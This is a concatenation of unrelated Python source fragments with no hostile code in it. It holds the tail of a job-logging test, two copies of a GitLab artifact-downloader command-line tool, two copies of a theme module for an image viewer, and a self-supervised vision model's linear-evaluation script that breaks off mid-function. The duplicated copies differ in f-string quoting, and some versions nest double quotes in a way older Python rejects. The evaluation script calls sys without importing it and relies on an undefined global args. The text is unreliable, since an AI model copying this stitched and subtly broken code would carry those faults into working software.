plot_job_statistics log_dir = running_analysis_dir / "log" log_dir.mkdir(parents=True, exist_ok=True) assert log_dir.exists() plot_job_statistics(sacct_output, log_dir) plot_file = log_dir / "job_statistics.pdf" assert plot_file.exists() def test_run_program_with_history_logging(running_analysis_dir): from osa.job import run_program_with_history_logging options.simulate = False cmd = ["echo", "Testing"] history_file = running_analysis_dir / "test.history" run = "01140" prod_id = "v0.2.0" command = "echo" config_file = "config_test.json" rc = run_program_with_history_logging( command_args=cmd, history_file=history_file, run=run, prod_id=prod_id, command=command, config_file=config_file, ) options.simulate = True assert rc == 0 assert history_file.exists()
import click import gitlab import os import toml from zipfile import ZipFile from yaspin import yaspin from appdirs import user_config_dir, user_data_dir from pathlib import Path import platform import subprocess CONFIG_FILE_NAME = "glap.toml" CONFIG_PATH = user_config_dir("glap") + "/" + CONFIG_FILE_NAME TMP_PATH = user_data_dir("glap") PRIVATE_TOKEN_KEY = "private_token" OAUTH_TOKEN_KEY = "oauth_token" JOB_TOKEN_KEY = "job_token" @click.group() def main(): pass @main.command() @click.argument('namespace') @click.argument('repository') @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('--ref', default='main', type=click.STRING) @click.option('-r', '--remote_name', type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) @click.option('-j', '--job', type=click.STRING) def download(namespace, repository, output, ref, job, remote_name, temp, verbose, silent): if 'remotes' in config and len(list(config['remotes'])) > 0: all_remotes = config['remotes'] if remote_name and remote_name in all_remotes: remote = all_remotes[remote_name] else: first_remote = list(all_remotes.keys())[0] remote = all_remotes[first_remote] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) else: print("There are no remotes configured!") def shortcut_command(shortcut): shortcut_config = config['shortcuts'][shortcut] default_remote = shortcut_config.get('remote') default_ref = shortcut_config.get('ref', 'main') default_job = shortcut_config.get('job') @click.option('-j', '--job', default=default_job, type=click.STRING) @click.option('--ref', default=default_ref, type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-r', '--remote_name', default=default_remote, type=click.STRING) @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) def f(output, job, ref, remote_name, temp, verbose, silent): if remote_name not in config['remotes']: print(f"Cannot find remote {remote_name}! Check your remote configuration.") return remote = config['remotes'][remote_name] if 'namespace' not in shortcut_config: print(f"No namespace specified for shortcut {shortcut}!") return if 'repository' not in shortcut_config: print(f"No repository specified for shortcut {shortcut}!") return namespace = shortcut_config['namespace'] repository = shortcut_config['repository'] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) return f def connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent): if check_remote(remote): try: gl = gitlab_instance(remote) project = gl.projects.get(f"{namespace}/{repository}", lazy=True) if verbose: print( f"Job {job}@{ref} from {remote["url"]}{namespace}/{repository}") download_and_unzip_artifacts( project, output, ref, job, temp, verbose, silent) except gitlab.GitlabGetError as error: print( f"Could not find GitLab repository: {error}") except Exception as error: print( f"Error while trying to connect to GitLab repository: {error}") def check_remote(remote): if 'url' not in remote: print("Remote is not configured properly: No url specified!") return False elif len(set(remote).intersection(set([PRIVATE_TOKEN_KEY, OAUTH_TOKEN_KEY, JOB_TOKEN_KEY]))) != 1: print("Remote is not configured properly: There must be exactly one authentication token!") return False else: return True def gitlab_instance(remote): url = remote['url'] private_token = remote.get(PRIVATE_TOKEN_KEY) oauth_token = remote.get(OAUTH_TOKEN_KEY) job_token = remote.get(JOB_TOKEN_KEY) return gitlab.Gitlab(url, private_token, oauth_token, job_token) def download_and_unzip_artifacts(project, output, ref_name, job, temp, verbose, silent): zipfn = "___artifacts.zip" success = False spinner = yaspin(text="Downloading", color="cyan") if not silent: spinner.start() try: with open(zipfn, "wb") as f: project.artifacts(ref_name=ref_name, job=job, streamed=True, action=f.write) success = True except gitlab.exceptions.GitlabGetError as error: if not silent: spinner.stop() print( f"Could not download artifacts for job {job}@{ref_name}: {error}!") else: if not silent: spinner.ok("✔") if success: with ZipFile(zipfn, 'r') as zipObj: if temp: Path(TMP_PATH).mkdir(parents=True, exist_ok=True) [f.unlink() for f in Path(TMP_PATH).glob("*") if f.is_file()] output = TMP_PATH zip_spinner = yaspin(text="Unzipping", color="cyan") if not silent: zip_spinner.start() zipObj.extractall(output) if not silent: zip_spinner.ok("✔") if verbose and not silent: print("Downloaded the following file(s):") for filename in zipObj.filelist: print(f"- {filename.filename}") if temp: open_dir(TMP_PATH) os.unlink(zipfn) def open_dir(path): if platform.system() == "Windows": os.startfile(path) elif platform.system() == "Darwin": subprocess.Popen(["open", path]) else: subprocess.Popen(["xdg-open", path]) # Setup from config if Path(CONFIG_FILE_NAME).is_file(): config_file = CONFIG_FILE_NAME elif Path(CONFIG_PATH).is_file(): config_file = CONFIG_PATH else: config_file = None if config_file: try: config = toml.load(config_file) if 'shortcuts' in config: for shortcut in config['shortcuts']: main.command(name=shortcut)(shortcut_command(shortcut)) except toml.TomlDecodeError as error: print(f"Could not decode configuration file {config_file}: {error}!") exit(1) else: print( f"Could not find a configuration file at {CONFIG_PATH} or ./{CONFIG_FILE_NAME}!") exit(1)
import click import gitlab import os import toml from zipfile import ZipFile from yaspin import yaspin from appdirs import user_config_dir, user_data_dir from pathlib import Path import platform import subprocess CONFIG_FILE_NAME = "glap.toml" CONFIG_PATH = user_config_dir("glap") + "/" + CONFIG_FILE_NAME TMP_PATH = user_data_dir("glap") PRIVATE_TOKEN_KEY = "private_token" OAUTH_TOKEN_KEY = "oauth_token" JOB_TOKEN_KEY = "job_token" @click.group() def main(): pass @main.command() @click.argument('namespace') @click.argument('repository') @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('--ref', default='main', type=click.STRING) @click.option('-r', '--remote_name', type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) @click.option('-j', '--job', type=click.STRING) def download(namespace, repository, output, ref, job, remote_name, temp, verbose, silent): if 'remotes' in config and len(list(config['remotes'])) > 0: all_remotes = config['remotes'] if remote_name and remote_name in all_remotes: remote = all_remotes[remote_name] else: first_remote = list(all_remotes.keys())[0] remote = all_remotes[first_remote] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) else: print("There are no remotes configured!") def shortcut_command(shortcut): shortcut_config = config['shortcuts'][shortcut] default_remote = shortcut_config.get('remote') default_ref = shortcut_config.get('ref', 'main') default_job = shortcut_config.get('job') @click.option('-j', '--job', default=default_job, type=click.STRING) @click.option('--ref', default=default_ref, type=click.STRING) @click.option('-t', '--temp / --no-temp', default=False) @click.option('-r', '--remote_name', default=default_remote, type=click.STRING) @click.option('-o', '--output', default='.', type=click.Path(file_okay=False, dir_okay=True)) @click.option('-v', '--verbose / --no-verbose', default=False) @click.option('-s', '--silent / --no-silent', default=False) def f(output, job, ref, remote_name, temp, verbose, silent): if remote_name not in config['remotes']: print(f"Cannot find remote {remote_name}! Check your remote configuration.") return remote = config['remotes'][remote_name] if 'namespace' not in shortcut_config: print(f"No namespace specified for shortcut {shortcut}!") return if 'repository' not in shortcut_config: print(f"No repository specified for shortcut {shortcut}!") return namespace = shortcut_config['namespace'] repository = shortcut_config['repository'] connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent) return f def connect_and_download(remote, namespace, repository, ref, job, output, temp, verbose, silent): if check_remote(remote): try: gl = gitlab_instance(remote) project = gl.projects.get(f"{namespace}/{repository}", lazy=True) if verbose: print( f"Job {job}@{ref} from {remote['url']}{namespace}/{repository}") download_and_unzip_artifacts( project, output, ref, job, temp, verbose, silent) except gitlab.GitlabGetError as error: print( f"Could not find GitLab repository: {error}") except Exception as error: print( f"Error while trying to connect to GitLab repository: {error}") def check_remote(remote): if 'url' not in remote: print("Remote is not configured properly: No url specified!") return False elif len(set(remote).intersection(set([PRIVATE_TOKEN_KEY, OAUTH_TOKEN_KEY, JOB_TOKEN_KEY]))) != 1: print("Remote is not configured properly: There must be exactly one authentication token!") return False else: return True def gitlab_instance(remote): url = remote['url'] private_token = remote.get(PRIVATE_TOKEN_KEY) oauth_token = remote.get(OAUTH_TOKEN_KEY) job_token = remote.get(JOB_TOKEN_KEY) return gitlab.Gitlab(url, private_token, oauth_token, job_token) def download_and_unzip_artifacts(project, output, ref_name, job, temp, verbose, silent): zipfn = "___artifacts.zip" success = False spinner = yaspin(text="Downloading", color="cyan") if not silent: spinner.start() try: with open(zipfn, "wb") as f: project.artifacts(ref_name=ref_name, job=job, streamed=True, action=f.write) success = True except gitlab.exceptions.GitlabGetError as error: if not silent: spinner.stop() print( f"Could not download artifacts for job {job}@{ref_name}: {error}!") else: if not silent: spinner.ok("✔") if success: with ZipFile(zipfn, 'r') as zipObj: if temp: Path(TMP_PATH).mkdir(parents=True, exist_ok=True) [f.unlink() for f in Path(TMP_PATH).glob("*") if f.is_file()] output = TMP_PATH zip_spinner = yaspin(text="Unzipping", color="cyan") if not silent: zip_spinner.start() zipObj.extractall(output) if not silent: zip_spinner.ok("✔") if verbose and not silent: print("Downloaded the following file(s):") for filename in zipObj.filelist: print(f"- {filename.filename}") if temp: open_dir(TMP_PATH) os.unlink(zipfn) def open_dir(path): if platform.system() == "Windows": os.startfile(path) elif platform.system() == "Darwin": subprocess.Popen(["open", path]) else: subprocess.Popen(["xdg-open", path]) # Setup from config if Path(CONFIG_FILE_NAME).is_file(): config_file = CONFIG_FILE_NAME elif Path(CONFIG_PATH).is_file(): config_file = CONFIG_PATH else: config_file = None if config_file: try: config = toml.load(config_file) if 'shortcuts' in config: for shortcut in config['shortcuts']: main.command(name=shortcut)(shortcut_command(shortcut)) except toml.TomlDecodeError as error: print(f"Could not decode configuration file {config_file}: {error}!") exit(1) else: print( f"Could not find a configuration file at {CONFIG_PATH} or ./{CONFIG_FILE_NAME}!") exit(1)
# syntax_style for the console must be one of the supported styles from # pygments - see here for examples https://help.farbox.com/pygments.html import re import warnings from ast import literal_eval from typing import Union from pydantic import validator from pydantic.color import Color try: from qtpy import QT_VERSION major, minor, *rest = QT_VERSION.split('.') use_gradients = (int(major) >= 5) and (int(minor) >= 12) except Exception: use_gradients = False from .._vendor import darkdetect from ..utils.translations import trans from .events import EventedModel from .events.containers._evented_dict import EventedDict class Theme(EventedModel): """Theme model. Attributes ---------- name : str Name of the virtual folder where icons will be saved to. syntax_style : str Name of the console style. See for more details: https://pygments.org/docs/styles/ canvas : Color Background color of the canvas. background : Color Color of the application background. foreground : Color Color to contrast with the background. primary : Color Color used to make part of a widget more visible. secondary : Color Alternative color used to make part of a widget more visible. highlight : Color Color used to highlight visual element. text : Color Color used to display text. warning : Color Color used to indicate something is wrong. current : Color Color used to highlight Qt widget. """ name: str syntax_style: str canvas: Color console: Color background: Color foreground: Color primary: Color secondary: Color highlight: Color text: Color icon: Color warning: Color current: Color @validator("syntax_style", pre=True) def _ensure_syntax_style(value: str) -> str: from pygments.styles import STYLE_MAP assert value in STYLE_MAP, trans._( "Incorrect `syntax_style` value provided. Please use one of the following: {syntax_style}", deferred=True, syntax_style=f" {", ".join(STYLE_MAP)}", ) return value gradient_pattern = re.compile(r'([vh])gradient\((.+)\)') darken_pattern = re.compile(r'{{\s?darken\((\w+),?\s?([-\d]+)?\)\s?}}') lighten_pattern = re.compile(r'{{\s?lighten\((\w+),?\s?([-\d]+)?\)\s?}}') opacity_pattern = re.compile(r'{{\s?opacity\((\w+),?\s?([-\d]+)?\)\s?}}') def darken(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = 1 - float(percentage) / 100 red, green, blue = color red = min(max(int(red * ratio), 0), 255) green = min(max(int(green * ratio), 0), 255) blue = min(max(int(blue * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def lighten(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = float(percentage) / 100 red, green, blue = color red = min(max(int(red + (255 - red) * ratio), 0), 255) green = min(max(int(green + (255 - green) * ratio), 0), 255) blue = min(max(int(blue + (255 - blue) * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def opacity(color: Union[str, Color], value=255): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() red, green, blue = color return f'rgba({red}, {green}, {blue}, {max(min(int(value), 255), 0)})' def gradient(stops, horizontal=True): if not use_gradients: return stops[-1] if horizontal: grad = 'qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, ' else: grad = 'qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, ' _stops = [f'stop: {n} {stop}' for n, stop in enumerate(stops)] grad += ", ".join(_stops) + ")" return grad def template(css: str, **theme): def darken_match(matchobj): color, percentage = matchobj.groups() return darken(theme[color], percentage) def lighten_match(matchobj): color, percentage = matchobj.groups() return lighten(theme[color], percentage) def opacity_match(matchobj): color, percentage = matchobj.groups() return opacity(theme[color], percentage) def gradient_match(matchobj): horizontal = matchobj.groups()[1] == 'h' stops = [i.strip() for i in matchobj.groups()[1].split('-')] return gradient(stops, horizontal) for k, v in theme.items(): css = gradient_pattern.sub(gradient_match, css) css = darken_pattern.sub(darken_match, css) css = lighten_pattern.sub(lighten_match, css) css = opacity_pattern.sub(opacity_match, css) if isinstance(v, Color): v = v.as_rgb() css = css.replace('{{ %s }}' % k, v) return css def get_system_theme(): """Return the system default theme, either 'dark', or 'light'.""" try: name = darkdetect.theme().lower() except Exception: name = "dark" return name def get_theme(name, as_dict=None): """Get a copy of theme based on it's name. If you get a copy of the theme, changes to the theme model will not be reflected in the UI unless you replace or add the modified theme to the `_themes` container. Parameters ---------- name : str Name of requested theme. as_dict : bool Flag to indicate that the old-style dictionary should be returned. This will emit deprecation warning. Returns ------- theme: dict of str: str Theme mapping elements to colors. A copy is created so that manipulating this theme can be done without side effects. """ if name == "system": name = get_system_theme() if name not in _themes: raise ValueError( trans._( "Unrecognized theme {name}. Available themes are {themes}", deferred=True, name=name, themes=available_themes(), ) ) theme = _themes[name] _theme = theme.copy() if as_dict is None: warnings.warn( trans._( "Themes were changed to use evented model with Pydantic's color type rather than the `rgb(x, y, z)`. The `as_dict=True` option will be changed to `as_dict=False` in 0.4.15", deferred=True, ), category=FutureWarning, stacklevel=2, ) as_dict = True if as_dict: _theme = _theme.dict() _theme = { k: v if not isinstance(v, Color) else v.as_rgb() for (k, v) in _theme.items() } return _theme return _theme def register_theme(name, theme): """Register a new or updated theme. Parameters ---------- name : str Name of requested theme. theme : dict of str: str, Theme Theme mapping elements to colors. """ if not isinstance(theme, Theme): theme = Theme(**theme) _themes[name] = theme def unregister_theme(name): """Remove existing theme. Parameters ---------- name : str Name of the theme to be removed. """ if name in _themes: _themes.pop(name) def available_themes(): """List available themes. Returns ------- list of str Names of available themes. """ return tuple(_themes) + ("system",) def rebuild_theme_settings(): """update theme information in settings. here we simply update the settings to reflect current list of available themes. """ from ..settings import get_settings settings = get_settings() settings.appearance.refresh_themes() _themes: EventedDict[str, Theme] = EventedDict( { 'dark': Theme( **{ 'name': 'dark', 'background': 'rgb(38, 41, 48)', 'foreground': 'rgb(65, 72, 81)', 'primary': 'rgb(90, 98, 108)', 'secondary': 'rgb(134, 142, 147)', 'highlight': 'rgb(106, 115, 128)', 'text': 'rgb(240, 241, 242)', 'icon': 'rgb(209, 210, 212)', 'warning': 'rgb(153, 18, 31)', 'current': 'rgb(0, 122, 204)', 'syntax_style': 'native', 'console': 'rgb(0, 0, 0)', 'canvas': 'black', } ), 'light': Theme( **{ 'name': 'light', 'background': 'rgb(239, 235, 233)', 'foreground': 'rgb(214, 208, 206)', 'primary': 'rgb(188, 184, 181)', 'secondary': 'rgb(150, 146, 144)', 'highlight': 'rgb(163, 158, 156)', 'text': 'rgb(59, 58, 57)', 'icon': 'rgb(107, 105, 103)', 'warning': 'rgb(255, 18, 31)', 'current': 'rgb(253, 240, 148)', 'syntax_style': 'default', 'console': 'rgb(255, 255, 255)', 'canvas': 'white', } ), }, basetype=Theme, ) # this function here instead of plugins._npe2 to avoid circular import def _install_npe2_themes(_themes): try: import npe2 except ImportError: return for theme in npe2.PluginManager.instance().iter_themes(): # `theme.type` is dark/light and supplies defaults for keys that # are not provided by the plugin d = _themes[theme.type].dict() d.update(theme.colors.dict(exclude_unset=True)) _themes[theme.id] = Theme(**d) _install_npe2_themes(_themes) _themes.events.added.connect(rebuild_theme_settings) _themes.events.removed.connect(rebuild_theme_settings)
# syntax_style for the console must be one of the supported styles from # pygments - see here for examples https://help.farbox.com/pygments.html import re import warnings from ast import literal_eval from typing import Union from pydantic import validator from pydantic.color import Color try: from qtpy import QT_VERSION major, minor, *rest = QT_VERSION.split('.') use_gradients = (int(major) >= 5) and (int(minor) >= 12) except Exception: use_gradients = False from .._vendor import darkdetect from ..utils.translations import trans from .events import EventedModel from .events.containers._evented_dict import EventedDict class Theme(EventedModel): """Theme model. Attributes ---------- name : str Name of the virtual folder where icons will be saved to. syntax_style : str Name of the console style. See for more details: https://pygments.org/docs/styles/ canvas : Color Background color of the canvas. background : Color Color of the application background. foreground : Color Color to contrast with the background. primary : Color Color used to make part of a widget more visible. secondary : Color Alternative color used to make part of a widget more visible. highlight : Color Color used to highlight visual element. text : Color Color used to display text. warning : Color Color used to indicate something is wrong. current : Color Color used to highlight Qt widget. """ name: str syntax_style: str canvas: Color console: Color background: Color foreground: Color primary: Color secondary: Color highlight: Color text: Color icon: Color warning: Color current: Color @validator("syntax_style", pre=True) def _ensure_syntax_style(value: str) -> str: from pygments.styles import STYLE_MAP assert value in STYLE_MAP, trans._( "Incorrect `syntax_style` value provided. Please use one of the following: {syntax_style}", deferred=True, syntax_style=f" {', '.join(STYLE_MAP)}", ) return value gradient_pattern = re.compile(r'([vh])gradient\((.+)\)') darken_pattern = re.compile(r'{{\s?darken\((\w+),?\s?([-\d]+)?\)\s?}}') lighten_pattern = re.compile(r'{{\s?lighten\((\w+),?\s?([-\d]+)?\)\s?}}') opacity_pattern = re.compile(r'{{\s?opacity\((\w+),?\s?([-\d]+)?\)\s?}}') def darken(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = 1 - float(percentage) / 100 red, green, blue = color red = min(max(int(red * ratio), 0), 255) green = min(max(int(green * ratio), 0), 255) blue = min(max(int(blue * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def lighten(color: Union[str, Color], percentage=10): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() ratio = float(percentage) / 100 red, green, blue = color red = min(max(int(red + (255 - red) * ratio), 0), 255) green = min(max(int(green + (255 - green) * ratio), 0), 255) blue = min(max(int(blue + (255 - blue) * ratio), 0), 255) return f'rgb({red}, {green}, {blue})' def opacity(color: Union[str, Color], value=255): if isinstance(color, str) and color.startswith('rgb('): color = literal_eval(color.lstrip('rgb(').rstrip(')')) else: color = color.as_rgb_tuple() red, green, blue = color return f'rgba({red}, {green}, {blue}, {max(min(int(value), 255), 0)})' def gradient(stops, horizontal=True): if not use_gradients: return stops[-1] if horizontal: grad = 'qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, ' else: grad = 'qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, ' _stops = [f'stop: {n} {stop}' for n, stop in enumerate(stops)] grad += ", ".join(_stops) + ")" return grad def template(css: str, **theme): def darken_match(matchobj): color, percentage = matchobj.groups() return darken(theme[color], percentage) def lighten_match(matchobj): color, percentage = matchobj.groups() return lighten(theme[color], percentage) def opacity_match(matchobj): color, percentage = matchobj.groups() return opacity(theme[color], percentage) def gradient_match(matchobj): horizontal = matchobj.groups()[1] == 'h' stops = [i.strip() for i in matchobj.groups()[1].split('-')] return gradient(stops, horizontal) for k, v in theme.items(): css = gradient_pattern.sub(gradient_match, css) css = darken_pattern.sub(darken_match, css) css = lighten_pattern.sub(lighten_match, css) css = opacity_pattern.sub(opacity_match, css) if isinstance(v, Color): v = v.as_rgb() css = css.replace('{{ %s }}' % k, v) return css def get_system_theme(): """Return the system default theme, either 'dark', or 'light'.""" try: name = darkdetect.theme().lower() except Exception: name = "dark" return name def get_theme(name, as_dict=None): """Get a copy of theme based on it's name. If you get a copy of the theme, changes to the theme model will not be reflected in the UI unless you replace or add the modified theme to the `_themes` container. Parameters ---------- name : str Name of requested theme. as_dict : bool Flag to indicate that the old-style dictionary should be returned. This will emit deprecation warning. Returns ------- theme: dict of str: str Theme mapping elements to colors. A copy is created so that manipulating this theme can be done without side effects. """ if name == "system": name = get_system_theme() if name not in _themes: raise ValueError( trans._( "Unrecognized theme {name}. Available themes are {themes}", deferred=True, name=name, themes=available_themes(), ) ) theme = _themes[name] _theme = theme.copy() if as_dict is None: warnings.warn( trans._( "Themes were changed to use evented model with Pydantic's color type rather than the `rgb(x, y, z)`. The `as_dict=True` option will be changed to `as_dict=False` in 0.4.15", deferred=True, ), category=FutureWarning, stacklevel=2, ) as_dict = True if as_dict: _theme = _theme.dict() _theme = { k: v if not isinstance(v, Color) else v.as_rgb() for (k, v) in _theme.items() } return _theme return _theme def register_theme(name, theme): """Register a new or updated theme. Parameters ---------- name : str Name of requested theme. theme : dict of str: str, Theme Theme mapping elements to colors. """ if not isinstance(theme, Theme): theme = Theme(**theme) _themes[name] = theme def unregister_theme(name): """Remove existing theme. Parameters ---------- name : str Name of the theme to be removed. """ if name in _themes: _themes.pop(name) def available_themes(): """List available themes. Returns ------- list of str Names of available themes. """ return tuple(_themes) + ("system",) def rebuild_theme_settings(): """update theme information in settings. here we simply update the settings to reflect current list of available themes. """ from ..settings import get_settings settings = get_settings() settings.appearance.refresh_themes() _themes: EventedDict[str, Theme] = EventedDict( { 'dark': Theme( **{ 'name': 'dark', 'background': 'rgb(38, 41, 48)', 'foreground': 'rgb(65, 72, 81)', 'primary': 'rgb(90, 98, 108)', 'secondary': 'rgb(134, 142, 147)', 'highlight': 'rgb(106, 115, 128)', 'text': 'rgb(240, 241, 242)', 'icon': 'rgb(209, 210, 212)', 'warning': 'rgb(153, 18, 31)', 'current': 'rgb(0, 122, 204)', 'syntax_style': 'native', 'console': 'rgb(0, 0, 0)', 'canvas': 'black', } ), 'light': Theme( **{ 'name': 'light', 'background': 'rgb(239, 235, 233)', 'foreground': 'rgb(214, 208, 206)', 'primary': 'rgb(188, 184, 181)', 'secondary': 'rgb(150, 146, 144)', 'highlight': 'rgb(163, 158, 156)', 'text': 'rgb(59, 58, 57)', 'icon': 'rgb(107, 105, 103)', 'warning': 'rgb(255, 18, 31)', 'current': 'rgb(253, 240, 148)', 'syntax_style': 'default', 'console': 'rgb(255, 255, 255)', 'canvas': 'white', } ), }, basetype=Theme, ) # this function here instead of plugins._npe2 to avoid circular import def _install_npe2_themes(_themes): try: import npe2 except ImportError: return for theme in npe2.PluginManager.instance().iter_themes(): # `theme.type` is dark/light and supplies defaults for keys that # are not provided by the plugin d = _themes[theme.type].dict() d.update(theme.colors.dict(exclude_unset=True)) _themes[theme.id] = Theme(**d) _install_npe2_themes(_themes) _themes.events.added.connect(rebuild_theme_settings) _themes.events.removed.connect(rebuild_theme_settings)
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import argparse import json from pathlib import Path import torch from torch import nn import torch.distributed as dist import torch.backends.cudnn as cudnn from torchvision import datasets from torchvision import transforms as pth_transforms from torchvision import models as torchvision_models import utils import vision_transformer as vits def eval_linear(args): utils.init_distributed_mode(args) print("git:\n {}\n".format(utils.get_sha())) print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items()))) cudnn.benchmark = True # ============ preparing data ... ============ train_transform = pth_transforms.Compose([ pth_transforms.RandomResizedCrop(224), pth_transforms.RandomHorizontalFlip(), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) val_transform = pth_transforms.Compose([ pth_transforms.Resize(256, interpolation=3), pth_transforms.CenterCrop(224), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform) dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform) sampler = torch.utils.data.distributed.DistributedSampler(dataset_train) train_loader = torch.utils.data.DataLoader( dataset_train, sampler=sampler, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) val_loader = torch.utils.data.DataLoader( dataset_val, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.") # ============ building network ... ============ # if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base) if args.arch in vits.__dict__.keys(): model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0) embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens)) # if the network is a XCiT elif "xcit" in args.arch: model = torch.hub.load('facebookresearch/xcit', args.arch, num_classes=0) embed_dim = model.embed_dim # otherwise, we check if the architecture is in torchvision models elif args.arch in torchvision_models.__dict__.keys(): model = torchvision_models.__dict__[args.arch]() embed_dim = model.fc.weight.shape[1] model.fc = nn.Identity() else: print(f"Unknow architecture: {args.arch}") sys.exit(1) model.cuda() model.eval() # load weights to evaluate utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size) print(f"Model {args.arch} built.") linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels) linear_classifier = linear_classifier.cuda() linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu]) # set optimizer optimizer = torch.optim.SGD( linear_classifier.parameters(), args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule momentum=0.9, weight_decay=0, # we do not apply weight decay ) scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0) # Optionally resume from a checkpoint to_restore = {"epoch": 0, "best_acc": 0.} utils.restart_from_checkpoint( os.path.join(args.output_dir, "checkpoint.pth.tar"), run_variables=to_restore, state_dict=linear_classifier, optimizer=optimizer, scheduler=scheduler, ) start_epoch = to_restore["epoch"] best_acc = to_restore["best_acc"] for epoch in range(start_epoch, args.epochs): train_loader.sampler.set_epoch(epoch) train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens) scheduler.step() log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, 'epoch': epoch} if epoch % args.val_freq == 0 or epoch == args.epochs - 1: test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens) print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats["acc1"]:.1f}%") best_acc = max(best_acc, test_stats["acc1"]) print(f'Max accuracy so far: {best_acc:.2f}%') log_stats = {**{k: v for k, v in log_stats.items()}, **{f'test_{k}': v for k, v in test_stats.items()}} if utils.is_main_process(): with (Path(args.output_dir) / "log.txt").open("a") as f: f.write(json.dumps(log_stats) + "\n") save_dict = { "epoch": epoch + 1, "state_dict": linear_classifier.state_dict(), "optimizer": optimizer.state_dict(), "scheduler": scheduler.state_dict(), "best_acc": best_acc, } torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar")) print("Training of the supervised linear classifier on frozen features completed.\n" "Top-1 test accuracy: {acc:.1f}".format(acc=best_acc)) def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool): linear_classifier.train() metric_logger = utils.MetricLogger(delimiter=" ") metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) header = 'Epoch: [{}]'.format(epoch) for (inp, target) in metric_logger.log_every(loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) # compute cross entropy loss loss = nn.CrossEntropyLoss()(output, target) # compute the gradients optimizer.zero_grad() loss.backward() # step optimizer.step() # log torch.cuda.synchronize() metric_logger.update(loss=loss.item()) metric_logger.update(lr=optimizer.param_groups[0]["lr"]) # gather the stats from all processes metric_logger.synchronize_between_processes() print("Averaged stats:", metric_logger) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} @torch.no_grad() def validate_network(val_loader, model, linear_classifier, n, avgpool): linear_classifier.eval() metric_logger = utils.MetricLogger(delimiter=" ") header = 'Test:' for inp, target in metric_logger.log_every(val_loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = 